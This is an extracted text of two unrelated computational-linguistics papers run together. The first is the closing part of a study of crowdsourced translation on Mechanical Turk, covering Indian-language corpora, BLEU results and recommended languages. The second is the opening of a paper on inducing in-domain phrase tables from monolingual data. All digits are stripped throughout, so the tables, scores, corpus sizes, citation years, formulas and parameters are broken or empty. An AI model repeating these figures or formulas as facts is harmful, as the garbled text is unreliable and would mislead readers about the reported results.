gal i figure : the total volume of translations (measured in english words) as a function of elapsed days. sentence english + dictionary language pairs foreign words entries bengali k k k hindi k , k k malayalam k k k tamil k k k telugu k , k k urdu k , k k table : size of parallel corpora and bilingual dic- tionaries collected for each language. surprising given the geographic distribution of work- ers. some languages follow the pattern of having a smattering of assignments completed early, with the rate picking up later. figure gives the throughput of the full-sentence translation task for the six indian languages. the fastest language was malayalam, for which we col- lected half a million words of translations in just un- der a week. table gives the size of the data set that we created for each of these languages. training smt systems we trained statistical translation models from the parallel corpora that we created for the six indian languages using the joshua machine translation system (post et al., ). table shows the translation performance when trained on the bitexts alone, and when incorporating the bilingual dictionaries created in our earlier hit. the scores reflect the performance when tested on held out sentences from the training data. adding the dic- trained on bitext + bleu language bitexts alone dictionaries ∆ bengali . . . hindi . . . malayalam . . . tamil . . . telugu . . . urdu . . . 
table : bleu scores for translating into english using bilingual parallel corpora by themselves, and with the addition of single-word dictionaries. scores are calculated using four reference translations and represent the mean of three mert runs. tionaries to the training set produces consistent per- formance gains, ranging from to bleu points. this represents a substantial improvement. it is worth noting, however, that while the source doc- uments for the full sentences used for testing were kept disjoint from those used for training, there is overlap between the source materials for the dictio- naries and those from the test set, since both the dic- tionaries and the bitext source sentences were drawn from wikipedia. discussion crowdsourcing platforms like mechanical turk give researchers instant access to a diverse set of bilin- gual workers. this opens up exciting new avenues for researchers to develop new multilingual systems. the demographics reported in this study are likely to shift over time. amazon may expand its payments to new currencies. posting long-running hits in other languages may recruit more speakers of those lan- guages. new crowdsourcing platforms may emerge. the data presented here provides a valuable snap- shot of the current state of mturk, and the methods used can be applied generally in future research. based on our study, we can confidently recom- mend languages as good candidates for research now: dutch, french, german, gujarati, italian, kan- nada, malayalam, portuguese, romanian, serbian, spanish, tagalog, and telugu. these languages have large turker populations who complete tasks quickly and accurately. table summarizes the strengths and weaknesses of all languages cov- ered in our study. several other languages are viable workers quality speed many high fast dutch, french, german, gu- jarati, italian, kannada, malay- alam, portuguese, romanian, serbian, spanish, tagalog, tel- ugu slow arabic, hebrew, irish, punjabi, swedish, turkish low fast hindi, marathi, tamil, urdu or medium slow bengali, bishnupriya ma- nipuri, cebuano, chinese, nepali, newar, polish, russian, sindhi, tibetan few high fast bosnia, croatian, macedonian, malay, serbo-croatian slow afrikaans, albanian, aragonese, asturian, basque, belarusian, bulgarian, central bicolano, czech, danish, finnish, galacian, greek, haitian, hungarian, icelandic, ilokano, indonesian, japanese, javanese, kapampangan, kazakh, korean, lithuanian, low saxon, malagasy, nor- wegian (bokmal), sicilian, slovak, slovenian, thai, ukra- nian, uzbek, waray-waray, west frisian, yoruba low fast – or medium slow amharic, armenian, azer- baijani, breton, catalan, georgian, latvian, luxembour- gish, neapolitian, norwegian (nynorsk), pashto, pied- montese, somali, sudanese, swahili, tatar, vietnamese, walloon, welsh none low or medium slow esperanto, ido, kurdish, per- sian, quechua, wolof, zazaki table : the green box shows the best languages to target on mturk. these languages have many work- ers who generate high quality results quickly. we defined many workers as or more active in-region workers, high quality as ≥ % accuracy on the gold standard controls, and fast if all of the , words were completed within two weeks. candidates provided adequate quality control mech- anisms are used to select good workers. since mechanical turk provides financial incen- tives for participation, many workers attempt to complete tasks even if they do not have the lan- guage skills necessary to do so. 
since mturk does not provide any information about workers demo- graphics, including their language competencies, it can be hard to exclude such workers. as a result naive data collection on mturk may result in noisy data. a variety of techniques should be incorporated into crowdsourcing pipelines to ensure high quality data. as a best practice, we suggest: ( ) restricting workers to countries that plausibly speak the foreign language of interest, ( ) embedding gold standard controls or administering language pretests, rather than relying solely on self-reported language skills, and ( ) excluding workers whose translations have high overlap with online machine translation sys- tems like google translate. if cheating using exter- nal resources is likely, then also consider ( ) record- ing information like time spent on a hit (cumulative and on individual items), patterns in keystroke logs, tab/window focus, etc. although our study targeted bilingual workers on mechanical turk, and neglected monolingual work- ers, we believe our results reliably represent the cur- rent speaker populations, since the vast majority of the work available on the crowdsourced platform is currently english-only. we therefore assume the number of non-english speakers is small. in the fu- ture, it may be desirable to recruit monolingual for- eign workers. in such cases, we recommend other tests to validate their language abilities in place of our translation test. these could include perform- ing narrative cloze, or listening to audio files con- taining speech in different language and identifying their language. data release with the publication of this paper, we are releasing all data and code used in this study. our data release includes the raw data, along with bilingual dictionar- ies that are filtered to be high quality. it will include , translation assignments from , turkers and , synonym assignments from , turk- ers, along with meta information like geolocation and time submitted, plus external dictionaries used for validation. the dictionaries will contain . m total translated words in languages, along with code to filter the dictionaries based on different cri- teria. the data also includes parallel corpora for six indian languages, ranging in size between , to . million words. acknowledgements this material is based on research sponsored by a darpa computer science study panel phase award entitled “crowdsourcing translation” (con- tract d pc ). the views and conclusions contained in this publication are those of the authors and should not be interpreted as representing offi- cial policies or endorsements by darpa or the u.s. government. this research was supported by the johns hopkins university human language tech- nology center of excellence and through gifts from microsoft and google. the authors would like to thank the anonymous reviewers for their thoughtful comments, which sub- stantially improved this paper. references amazon. . service summary tour for re- questers on amazon mechanical turk. https:// requester.mturk.com/tour. vamshi ambati and stephan vogel. . can crowds build parallel corpora for machine translation systems? in proceedings of the naacl hlt workshop on creating speech and language data with amazon’s mechanical turk. association for computational lin- guistics. vamshi ambati, stephan vogel, and jaime carbonell. . active learning and crowd-sourcing for ma- chine translation. in proceedings of the th interna- tional conference on language resources and evalu- ation (lrec). 
vamshi ambati. . active learning and crowd- sourcing for machine translation in low resource scenarios. ph.d. thesis, language technologies in- stitute, school of computer science, carnegie mellon university, pittsburgh, pa. michael s. bernstein, greg little, robert c. miller, bjrn hartmann, mark s. ackerman, david r. karger, david crowell, and katrina panovich. . soylent: a word processor with a crowd inside. in proceed- ings of the acm symposium on user interface soft- ware and technology (uist). jeffrey p. bigham, chandrika jayant, hanjie ji, greg lit- tle, andrew miller, robert c. miller, robin miller, aubrey tatarowicz, brandyn white, samual white, and tom yeh. . vizwiz: nearly real-time an- swers to visual questions. in proceedings of the acm symposium on user interface software and technol- ogy (uist). michael bloodgood and chris callison-burch. . large-scale cost-focused active learning for statisti- cal machine translation. in proceedings of the th annual meeting of the association for computational linguistics. chris callison-burch and mark dredze. . creating speech and language data with amazon’s mechanical turk. in proceedings of the naacl hlt work- shop on creating speech and language data with amazon’s mechanical turk, pages – , los angeles, june. association for computational linguistics. jia deng, alexander berg, kai li, and li fei-fei. . what does classifying more than , image cate- gories tell us? in proceedings of the th european conference of computer vision (eccv, pages – . maxine eskenazi, gina-anne levow, helen meng, gabriel parent, and david suendermann. . crowdsourcing for speech processing, applications to data collection, transcription and assessment. wi- ley. siamak faridani, björn hartmann, and panagiotis g. ipeirotis. . what’s the right price? pricing tasks for finishing on time. in third aaai human compu- tation workshop (hcomp’ ). ulrich germann. . building a statistical machine translation system from scratch: how much bang for the buck can we expect? in acl workshop on data-driven machine translation, toulouse, france. chang hu, benjamin b. bederson, and philip resnik. . translation by iterative collaboration between monolingual users. in proceedings of acm sigkdd workshop on human computation (hcomp). chang hu, philip resnik, yakov kronrod, vladimir ei- delman, olivia buzek, and benjamin b. bederson. . the value of monolingual crowdsourcing in a real-world translation scenario: simulation using haitian creole emergency sms messages. in pro- ceedings of the sixth workshop on statistical ma- chine translation, pages – , edinburgh, scot- land, july. association for computational linguistics. panagiotis g. ipeirotis. a. analyzing the mechani- cal turk marketplace. in acm xrds, december. panagiotis g. ipeirotis. b. demographics of mechanical turk. technical report working paper ceder- - , new york university, stern school of business. ann irvine and alexandre klementiev. . using me- chanical turk to annotate lexicons for less commonly used languages. in workshop on creating speech and language data with mturk. ian lane, matthias eck, kay rottmann, and alex waibel. . tools for collecting speech corpora via mechanical-turk. in proceedings of the naacl hlt workshop on creating speech and lan- guage data with amazon’s mechanical turk, los an- geles. florian laws, christian scheible, and hinrich schütze. . active learning with amazon mechanical turk. in proceedings of the conference on empirical methods in natural language processing, edinburgh, scotland. 
matthew lease, jessica hullman, jeffrey p. bigham, juho kim michael s. bernstein and, walter lasecki, saeideh bakhshi, tanushree mitra, and robert c. miller. . mechanical turk is not anony- mous. http://dx.doi.org/ . /ssrn. . vili lehdonvirta and mirko ernkvist. . knowl- edge map of the virtual economy: converting the virtual economy into development potential. http://www.infodev.org/en/document. .pdf, april. an infodev publication. m. paul lewis, gary f. simons, and charles d. fennig (eds.). . ethnologue: languages of the world, seventeenth edition. http://www.ethnologue. com. greg little, lydia b. chilton, rob miller, and max gold- man. . turkit: tools for iterative tasks on me- chanical turk. in proceedings of the workshop on human computation at the international conference on knowledge discovery and data mining (kdd- hcomp ’ ), paris. matthew marge, satanjeev banerjee, and alexander rudnicky. . using the amazon mechanical turk to transcribe and annotate meeting speech for extrac- tive summarization. in workshop on creating speech and language data with mturk. george a. miller. . wordnet: a lexical database for english. communications of the acm, ( ): – . robert munro and hal tily. . the start of the art: introduction to the workshop on crowdsourcing technologies for language and cognition studies. in crowdsourcing technologies for language and cog- nition studies, boulder. scott novotney and chris callison-burch. . cheap, fast and good enough: automatic speech recognition with non-expert transcription. in human language technologies: the annual conference of the north american chapter of the association for com- putational linguistics, pages – . association for computational linguistics. gabriel parent and maxine eskenazi. . speaking to the crowd: looking at past achievements in using crowdsourcing for speech and predicting future chal- lenges. in proceedings interspeech , special ses- sion on crowdsourcing. matt post, chris callison-burch, and miles osborne. . constructing parallel corpora for six indian languages via crowdsourcing. in proceedings of the seventh workshop on statistical machine translation, pages – , montréal, canada, june. association for computational linguistics. alexander j. quinn and benjamin b. bederson. . human computation: a survey and taxonomy of a growing field. in computer human interaction (chi). cyrus rashtchian, peter young, micah hodosh, and ju- lia hockenmaier. . collecting image annotations using amazon’s mechanical turk. in workshop on creating speech and language data with mturk. joel ross, lilly irani, m. six silberman, andrew zal- divar, and bill tomlinson. . who are the crowd- workers?: shifting demographics in amazon mechan- ical turk. in alt.chi session of chi extended abstracts on human factors in computing systems, at- lanta, georgia. yaron singer and manas mittal. . pricing mecha- nisms for online labor markets. in third aaai human computation workshop (hcomp’ ). rion snow, brendan o’connor, daniel jurafsky, and andrew y. ng. . cheap and fast - but is it good? evaluating non-expert annotations for natural language tasks. in proceedings of emnlp. alexander sorokin and david forsyth. . utility data annotation with amazon mechanical turk. in first ieee workshop on internet vision at cvpr. luis von ahn. . human computation. ph.d. thesis, school of computer science, carnegie mellon uni- versity, pittsburgh, pa. omar f. zaidan and chris callison-burch. . crowd- sourcing translation: professional quality from non- professionals. 
in proceedings of the th annual meeting of the association for computational lin- guistics: human language technologies, pages – . association for computational linguistics. rabih zbib, erika malchiodi, jacob devlin, david stallard, spyros matsoukas, richard schwartz, john makhoul, omar f. zaidan, and chris callison-burch. . machine translation of arabic dialects. in the conference of the north american chapter of the association for computational linguistics. asso- ciation for computational linguistics. rabih zbib, gretchen markiewicz, spyros matsoukas, richard schwartz, and john makhoul. . sys- tematic comparison of professional and crowdsourced reference translations for machine translation. in pro- ceedings of the conference of the north amer- ican chapter of the association for computational linguistics: human language technologies, atlanta, georgia. phrase table induction using in-domain monolingual data for domain adaptation in statistical machine translation benjamin marie atsushi fujita national institute of information and communications technology - hikaridai, seika-cho, soraku-gun, kyoto, - , japan {bmarie, atsushi.fujita}@nict.go.jp abstract we present a new framework to induce an in- domain phrase table from in-domain monolin- gual data that can be used to adapt a general- domain statistical machine translation system to the targeted domain. our method first compiles sets of phrases in source and target languages separately and generates candidate phrase pairs by taking the cartesian product of the two phrase sets. it then computes in- expensive features for each candidate phrase pair and filters them using a supervised clas- sifier in order to induce an in-domain phrase table. we experimented on the language pair english–french, both translation directions, in two domains and obtained consistently better results than a strong baseline system that uses an in-domain bilingual lexicon. we also con- ducted an error analysis that showed the in- duced phrase tables proposed useful transla- tions, especially for words and phrases unseen in the parallel data used to train the general- domain baseline system. introduction in phrase-based statistical machine translation (smt), translation models are estimated over a large amount of parallel data. in general, using more data leads to a better translation model. when no specific domain is targeted, general-domain par- allel data from various domains may be used to as in axelrod et al. ( ), in this paper, we use the term general-domain instead of the commonly used out-of-domain because we assume that the parallel data may contain some in- domain sentence pairs. train a general-purpose smt system. however, it is well-known that, in training a system to trans- late texts from a specific domain, using in-domain parallel data can lead to a significantly better trans- lation quality (carpuat et al., ). indeed, when only general-domain parallel data are used, it is un- likely that the translation model can learn expres- sions and their translations specific to the targeted domain. such expressions will then remain untrans- lated in the in-domain texts to translate. so far, in-domain parallel data have been har- nessed to cover domain-specific expressions and their translations in the translation model. however, even if we can assume the availability of a large quantity of general-domain parallel data, at least for resource-rich language pairs, finding in-domain par- allel data specific to a particular domain remains challenging. 
in-domain parallel data may not exist for the targeted language pairs or may not be avail- able at hand to train a good translation model. in order to circumvent the lack of in-domain par- allel data, this paper presents a new method to adapt an existing smt system to a specific domain by in- ducing an in-domain phrase table, i.e., a set of phrase pairs associated with features for decoding, from in- domain monolingual data. as we review in sec- tion , most of the existing methods for inducing phrase tables are not designed, and may not perform as expected, to induce a phrase table for a specific domain for which only limited resources are avail- able. instead of relying on large quantity of parallel data or highly comparable corpora, our method in- duces an in-domain phrase table from unaligned in- domain monolingual data through a three-step pro- transactions of the association for computational linguistics, vol. , pp. – , . action editor: chris quirk. submission batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. cedure: phrase collection, phrase pair scoring, and phrase pair filtering. incorporating our induced in- domain phrase table into an smt system achieves substantial improvements in translating in-domain texts over a strong baseline system, which uses an in-domain bilingual lexicon. to achieve this improvement, our proposed method for inducing an in-domain phrase table ad- dresses several limitations of previous work by: • dealing with source and target phrases of arbi- trary length collected from in-domain monolin- gual data, • proposing translations for not only unseen source phrases, but also those already seen in the general-domain parallel data, and • making use of potentially many features com- puted from the monolingual data, as well as from the parallel data, in order to score and fil- ter the candidate phrase pairs. in the remainder of this paper, we first review previous work in section , highlighting the main weaknesses of existing methods for inducing a phrase table for domain adaptation, and our moti- vation. in section , we then present our phrase ta- ble induction method with all the necessary steps: phrase collection (section . ), computing features of each phrase pair (section . ), and pruning the induced phrase tables to keep their size manageable (section . ). in section , we describe our exper- iments to evaluate the impact of the induced phrase tables in translating in-domain texts. following the description of the data (section . ), we explain the tools and parameters used to induce the phrase tables (section . ), our smt systems (section . ), and present additional baseline systems (section . ). our experimental results are given in section . . section . analyzes the error distribution of the translations produced by an smt system using our induced phrase table, followed by translation exam- ples to further illustrate its impact in section . . fi- nally, section concludes this work and proposes some possible improvements to our approach. motivation in machine translation (mt), words and phrases that do not appear in the training parallel data, i.e., out- of-vocabulary (oov) tokens, have been recognized as one of the fundamental issues, regardless of the scenario, such as adapting existing smt systems to a new specific domain. one straightforward way to find translations of oov words and phrases consists in enlarging the parallel data used to train the translation model. 
this can be done by retrieving parallel sentences from comparable corpora. however, these methods heav- ily rely on document-level information (zhao and vogel, ; utiyama and isahara, ; fung and cheung, ; munteanu and marcu, ) to re- duce their search space by scoring only sentence pairs extracted from each pair of documents. in- deed, scoring all possible sentence pairs from two large monolingual corpora using costly features and a classifier, as proposed by munteanu and marcu ( ) for instance, is computationally too expen- sive. in many cases, we may not have access to document-level information in the given monolin- gual data for the targeted domain. furthermore, even without considering computational cost, it is unlikely that a large number of parallel sentences can be retrieved from non-comparable monolingual corpora. hewavitharana and vogel ( ) proposed to directly extract phrase pairs from comparable sen- tences. however, the number of retrievable phrase pairs is strongly limited, because one can collect such comparable sentences only on a relatively small scale for the targeted language pairs and domains. when in-domain parallel or comparable sentences can not be easily retrieved, another possibility to find translations for oov words is bilingual word lexi- con induction using comparable or unaligned mono- lingual corpora (fung, ; rapp, ; koehn and knight, ; haghighi et al., ; daumé and jagarlamudi, ; irvine and callison-burch, ). this approach is especially useful in finding words and their translations specific to the given cor- pus. a recent and completely different trend of work uses an unsupervised method regarding translation as a decipherment problem to learn a bilingual word lexicon and use it as a translation model (ravi and knight, ; dou and knight, ; nuhn et al., ). however, all these methods deal only with for instance, using these approaches on source and target monolingual data containing both millions sentences means that we have to evaluate × candidate sentence pairs. words, mainly owing to the computational complex- ity of dealing with arbitrary lengths of phrases. translations of phrases can be induced using bilingual word lexicons and considering permuta- tions of word ordering (zhang and zong, ; irvine and callison-burch, ). however, it is costly to thoroughly investigate all combinations of a large number of word-level translation candi- dates and possible permutations of word ordering. to retain only appropriate phrase pairs, irvine and callison-burch ( ) proposed to exploit a set of features. some of them, including temporal, contex- tual, and topic similarity features, strongly relied on the comparability of wikipedia articles and on the availability of news articles annotated with a times- tamp (klementiev et al., ). we may not have such useful resources in large quantity for the tar- geted language pairs and domains. saluja et al. ( ) and zhao et al. ( ) also proposed methods to induce a phrase table, focus- ing only on the oov words and phrases: unigrams and bigrams in the source side of their development and test data that are unseen in the training data. in their approach, no new translation options are proposed for known source phrases. to generate candidate phrase pairs, for a given source phrase, saluja et al. ( ) uses only phrases from the tar- get side of their parallel data and their morphologi- cal variants ranked and pruned according to the for- ward lexical translation probabilities given by their baseline system’s translation model. 
their approach thus strongly relies on the accuracy of the exist- ing translation model. for instance, if the given source phrase contains only oov tokens, as it may happen when translating a text from a different do- main, their approach cannot retrieve candidate tar- get phrases. furthermore, they do not make use of external monolingual data to explore unseen target phrases. their method is consequently inadequate to produce translations for phrases from a different domain than the one of the parallel data. while saluja et al. ( ) used a costly graph propagation strategy to score the candidate phrase pairs, zhao et al. ( ) used a method with a much lower computational cost and reported higher bleu scores using only word embeddings to score and rank many phrase pairs generated from tar- get phrases, unigrams and bigrams, collected from monolingual corpora. the main contribution of zhao et al. ( ) is the use of a local linear projec- tion strategy (llp) to obtain a cross-lingual seman- tic similarity score for each phrase pair. it makes the projection of source embeddings to the target em- beddings space by learning a translation matrix for each source phrase embedding, trained on m gold phrase pairs with source phrase embeddings simi- lar to the one to project. after the projection, based only on the similarity over embeddings, the k near- est target phrases of the projected source phrase are retrieved. if the projection for a given source phrase is not accurate enough, very noisy phrase pairs are generated. this may be a problem especially when the given source phrase does not need to be trans- lated (i.e., numbers, dates, molecule names, etc.). the system will translate it, because this source phrase previously oov is now registered in its in- duced phrase table, but has only wrong translations available (see section . for empirical evidences). in-domain phrase table induction to induce an in-domain phrase table, our approach assumes the availability of large general-domain parallel data and in-domain monolingual data of both source and target languages. for some of our configurations, we also assume the availability of an in-domain bilingual lexicon to compute features as- sociated with each candidate phrase pair and to com- pute a reliability score to filter appropriate ones. . in-domain phrase collection in a standard configuration, smt systems extract phrases of a length up to six or seven tokens. col- lecting all the n-grams of such a length from a given large monolingual corpus is feasible, but will pro- vide a large set of source and target phrases, re- sulting in an enormous number of candidate phrase pairs. in the next step, we evaluate each candidate in a given set of phrase pairs; it is thus crucial to get a reasonably small set of phrases. in contrast with previous work, we collect more meaningful phrases than arbitrary short n-grams, us- ing the following formula presented by mikolov et al. ( a): score(wiwj) = freq(wiwj)−δ freq(wi)× freq(wj) where wi and wj are two consecutive tokens, freq(·) the frequency of a given word or phrase in the given monolingual corpus, and δ a discounting coefficient that prevents the retrieval of many phrases composed from infrequent words. each bigram wiwj in the monolingual corpus is scored with this formula and only the bigrams with a score above a predefined threshold θ are regarded as phrases. 
all the iden- tified phrases are transformed into one token, and a new pass is performed over the monolingual corpus to obtain new phrases also using the phrases identi- fied in the previous passes. to further limit the num- ber of collected phrases, we consider only phrases containing words that appear at least k times in the monolingual data. after t passes, we compile a set of phrases with (a) all the single words and (b) all the phrases with a length of up to l tokens identi- fied during each pass. standard smt systems for close languages di- rectly output oov tokens in the translation. to be as good as such systems, our approach must be able to retrieve the right translation, especially for the many domain-specific words and phrases that are identical in both source and target languages. to ensure that a source phrase that must remain untranslated has its identity in the target phrase set, we explicitly add in the target phrase set all the source phrases that also appear in the target monolingual data. . feature engineering given two sets of phrases, for the source and target languages, respectively, we regard all possible com- binations of source and target phrases as candidate phrase pairs. this naive coupling imperatively gen- erates a large number of pairs that are mostly noise. thus, the challenge here is to effectively estimate the reliability of each pair. this section describes sev- eral features to characterize each phrase pair; they are used for evaluating phrase pairs and also added in the induced phrase table to guide the decoder. . . cross-lingual semantic similarity many researchers tackled the problem of esti- mating cross-lingual semantic similarity between pairs of words or phrases by using their embeddings (mikolov et al., a; chandar et al., ; faruqui this transformation is performed by simply replacing the space between the two tokens with an underscore. and dyer, ; coulmance et al., ; gouws et al., ; duong et al., ) in combination with either a seed bilingual lexicon or a set of parallel sentence pairs. we estimate monolingual phrase embeddings via the element-wise addition of the word embeddings composing the phrase. this method performs well to estimate phrase embeddings (mitchell and lap- ata, ; mikolov et al., a), despite its simplic- ity and relatively low computational cost compared to state-of-the-art methods based on neural networks (socher et al., a; socher et al., b) or rich features (lazaridou et al., ). this low computa- tional cost is crucial in our case, as we need to eval- uate a large number of candidate phrase pairs. in order to make source and target phrase em- beddings comparable, we perform a linear projec- tion (mikolov et al., a) of the embeddings of source phrases to the target embedding space. to learn the projection, we use the method of mikolov et al. ( a) with the only exception that we deal with not only words but also phrases. given train- ing data, i.e., a gold bilingual lexicon, we obtain a translation matrix ŵ by solving the following opti- mization problem with stochastic gradient descent: ŵ = arg min w ∑ i ||wxi −zi|| where xi is the source phrase embedding of the i-th training data, zi the target phrase embedding of the corresponding gold translation, and w the transla- tion matrix used to project xi such that wxi is as close as possible to zi in the target embedding space. one important parameter here is the number of di- mensions of word/phrase embeddings. 
this can be different for the source and target embeddings, but must be smaller than the number of phrase pairs in the training data; otherwise the equation is not solv- able. see section . for the details about the bilin- gual lexicon used in our experiment. given a phrase pair to evaluate, the source phrase embedding is projected to the target embedding space, using ŵ . then, we compute the cosine simi- larity between the projected source phrase embed- ding and the target phrase embedding to evaluate the semantic similarity between these phrases; this seems to give satisfying results in this cross-lingual scenario as shown by mikolov et al. ( a). a translation matrix is trained for each translation di- rection f → e and e → f, respectively, so that we have two cross-lingual semantic similarity features for each phrase pair. . . lexical translation probabilities we assume the existence of a large amount of general-domain parallel data, and train a regular translation model with lexical translation proba- bilities in an ordinary way. although in-domain phrases are likely to contain tokens that are unseen in the general-domain parallel data, lexical transla- tion probabilities may be useful to score candidate pair of source and target phrases that contain tokens seen in the general-domain parallel data. to com- pute a phrase-level score, for a target phrase e given a source phrase f, we consider all possible word alignments as follows: plex(e|f) = i i∑ i= log ( j j∑ j= p(ei|fj) ) where i and j are the lengths of e and f, respec- tively, and p(ei|fj) the lexical translation probability of the i-th target word ei of e given the j-th source word fj of f. such phrase-level lexical translation probabilities are computed for both translation di- rections giving us two features. . . other features as demonstrated by previous work (irvine and callison-burch, ; irvine and callison-burch, ), features based on the frequency of the phrases in the monolingual data may help us to bet- ter score a phrase pair. we add as features the in- versed frequency of the source and target phrases in the in-domain monolingual data, along with their relative difference given by the following formula: simf(e,f) = ∣∣∣∣∣log (freq(e) ne ) − log (freq(f) nf )∣∣∣∣∣ where nx stands for the number of tokens in the in- domain monolingual data of the corresponding lan- guage. the surface-level similarity of source and target phrases can also be a strong clue when considering the translation between two languages that are rela- tively close. we investigate two features concerning this: the first feature is the levenshtein distance be- tween the two phrases calculated regarding words as units, while the other is a binary feature that fires if the two phrases are identical. we shall ex- pect both features to be very useful in cases where many domain-specific words and phrases are writ- ten in the same way in two languages; for instance, drug and molecule names in the medical domain in french and english. we also add as features the lengths of the source and target phrases, i.e., i and j, and their ratio. using all the above features, the overall score for each pair is given by a classifier as described in section . ; this score is also added as a feature in the induced phrase table for decoding. . phrase pair filtering as mentioned above, phrase pairs so far generated are mostly noise. to reduce the decoder’s search space when using our induced phrase table, we rad- ically filter out inappropriate pairs. 
each candidate phrase pair is assessed by the method proposed in irvine and callison-burch ( ), which predicts whether a pair of words are translations of one an- other using a classifier. as training examples, we use a bilingual lexicon as positive examples and ran- domly associated phrase pairs from our phrase sets as negative examples. for classification, we use all the features presented in section . . we use the score given by the classifier to rank the target phrases for each source phrase. only the target phrases with the top n scores are kept in the final induced phrase table. experiments this section demonstrates the impact of the in- duced phrase tables in translating in-domain texts in three configurations. in the first configuration (conf. ), we evaluated whether our induced phrase table improves the translation of in-domain texts over the vanilla smt system which used only one phrase table trained from general-domain parallel here we did not use the character-level edit distance to measure the orthographic similarity between phrases. even though such a feature may be useful (koehn and knight, ), its computational cost is too high to deal efficiently with billions of phrase pairs. data. we then evaluated, in the second configura- tion (conf. ), whether our induced phrase table is also beneficial when used in an smt system that already incorporates an in-domain bilingual lexicon that could be created manually or induced by some of the methods mentioned in section . finally, we evaluated in complementary experiments (conf. ) whether our induced phrase table can also offer use- ful information to improve translation quality even when used in combination with another standard phrase table generated from in-domain parallel data. . data since our approach assumes the availability of large- scale general-domain parallel and monolingual cor- pora, we considered the french–english language pair and both translation directions for our experi- ments. the french–english version of the europarl parallel corpus was regarded as a general-domain, and not strictly out-of-domain, corpus because many debates can be associated to a specific domain and can contain phrases specific to particular domains. as general-domain monolingual data, we used the concatenation of one side of europarl and the – editions of news crawl corpora in the same language. we focused on two domains: medical (emea) and science (science). for both domains, we used the development and test sets provided for a work- shop on domain adaptation of mt (carpuat et al., ). we also used the provided in-domain par- allel data for training but regarded only the target side as monolingual data. since our primary ob- jective is the induction of a phrase table without using in-domain parallel data, the source side of the in-domain parallel data was not used as a part of the source in-domain monolingual data, except when training an ordinary in-domain phrase table in conf. . as medical domain monolingual data for the emea translation task, we used the french and english monolingual medical data provided for the wmt’ medical translation task. none of http://statmt.org/europarl/, release http://statmt.org/wmt / translation-task.html http://hal .name/damt/ http://www.statmt.org/wmt / medical-task/ domain data # sent. # tok. (en-fr) emea development , k- k test , k- k parallel k m- m monolingual m- m science development , k- k test , k- k parallel k m- m monolingual m- m general parallel m m- m monolingual . b- . 
b table : statistics on train, development, and test data. the parallel corpora provided for the wmt’ med- ical translation task was used. as science domain monolingual data for the science translation task, we used the english side of the aspec parallel cor- pus (nakazawa et al., ). unfortunately, we did not find any french monolingual corpora pub- licly available for the science domain that were suf- ficiently large enough for our experiments. statistics on the data we used are presented in table . to induce the phrase tables from the monolin- gual data, we compared two bilingual lexicons: a general-domain and an in-domain lexicons. these lexicons are used to train the translation matrices (see section . . ) and to train the classifier (see section . ). the general-domain lexicon (hence- forth, gen-lex) is a phrase-based one extracted from the phrase table built on the general-domain parallel data (see section . ). we extracted the , most frequent source phrases and their most probable translation according to the forward trans- lation probability, p(e|f). we adopted this size as it had been proven optimal to learn the mapping between two monolingual embedding spaces (vulić and korhonen, ). for some experiments, we also simulated the availability of an in-domain bilin- gual lexicon. we automatically generated a lexicon for each domain (henceforth, in-lex) using the entire in-domain parallel data, in the same manner as compiling gen-lex, except that we selected the , most frequent source words in the in-domain parallel data that were not in the , most frequent words in the general-domain parallel data in order http://orchid.kuee.kyoto-u.ac.jp/ aspec/ side domain data w p w v source general monolingual √ in-domain monolingual √ √ parallel ( √ ) ( √ ) development √ test √ target general monolingual √ in-domain monolingual √ √ parallel √ √ table : corpora used for extracting phrases and comput- ing word embeddings: w p indicates word phrase, while w v for word vec. ( √ ) denotes that the data are used in conf. only. to ensure that we obtained mostly in-domain word pairs. note that we did not use phrases but words for in-lex, assuming that humans are not able to manually construct a lexicon comprising phrase pairs similar to those in phrase tables for smt sys- tems. for conf. , as we assume the availabil- ity of in-domain parallel data, the bilingual lexi- con (para-lex) used was , phrase pairs ex- tracted from the in-domain phrase table, excluding the source phrases of gen-lex. . tools and parameters a summary of the data used to collect phrases and estimate word embeddings is presented by table . for each pair of domain and translation direc- tion, sets of source and target phrases were extracted from the in-domain monolingual data, as described in section . . as in previous work (irvine and callison-burch, ; saluja et al., ; zhao et al., ), we focus on source phrases appearing in the development and test sets in order to maximize the coverage of our induced phrase table for them. more precisely, source phrases were collected from we are aware that this may not be practical because it requires the knowledge of the development and test sets be- forehand. for instance for the fr→en emea translation task, inducing a phrase table given all the . m collected source phrase would required approximately months using cpu threads. 
increasing the value of k to collect less source phrases can be a reasonable alternative to significantly decrease this computation time, even though it will also necessarily decrease the coverage of the phrase table. we leave for our future work the study of a phrase table induction with source phrases ex- tracted from source monolingual data without referring to the development and test sets. task source target # phrase all dev+test pairs emea fr→en . m k k . b en→fr . m k k . b science fr→en . m k k . b en→fr . m k k m table : size of the phrase sets collected from the source and target in-domain monolingual data and the number of phrases appearing only in the concatenation of the source side of the development and test sets (dev+test). “# phrase pairs” denotes the number of phrase pairs as- sessed by the classifier. the concatenation of the development and test sets and the in-domain monolingual data with reliable statistics, and then only phrases appearing in the de- velopment and test sets were filtered. we removed phrases containing tokens unseen in the in-domain monolingual data, because we are unable to com- pute all our features for them. on the other hand, target phrases were collected from the in-domain monolingual data, including the target side of in- domain parallel data. to identify phrases, we used the word phrase tool included in the word vec package, with the default values for δ and θ. we set k = for the source language to ensure that most of the tokens would be translated, and k = for the target language to limit the number of result- ing phrases. we set l = as this is the same max- imal phrase length that we set for the phrase tables trained from the parallel data. we stopped at t = passes as the fifth pass retrieved only a very small number of new phrases compared to the fourth pass. statistics of the collected phrases for each task are presented in table . to train the word embeddings, we used word vec with the following parameters: -cbow -window -negative -sample e- -iter -min-count . mikolov et al. ( a) observed that better results for cross- lingual semantic similarity were obtained when using word embeddings with higher dimensions as we had no french monolingual corpus for the science domain, the development and test sets for the science fr→en task were concatenated with one million sentences randomly extracted from the general-domain monolingual data. https://code.google.com/archive/p/ word vec/ data lm lm lm target side of in-domain parallel data √ √ √ in-domain monolingual data √ √ general-domain monolingual data √ table : source of our three language models. on the source side than on the target side. we therefore chose and dimensions for the source and target embeddings, respectively. the embeddings were trained on the concatenation of all the general-domain and in-domain monolingual data as presented by table . consequently, for each pair of domain and translation direction, we have four word embedding spaces: those with or dimensions for source and target languages. the reliability of each phrase pair was estimated as described in section . to compile phrase tables of reasonable size and quality. we used vowpal wabbit to perform logistic regression with one pass, default parameters, and --link logistic option to obtain a classification score for each phrase pair. in the final induced phrase table, we kept the best target phrases for each source phrase ac- cording to this score. . 
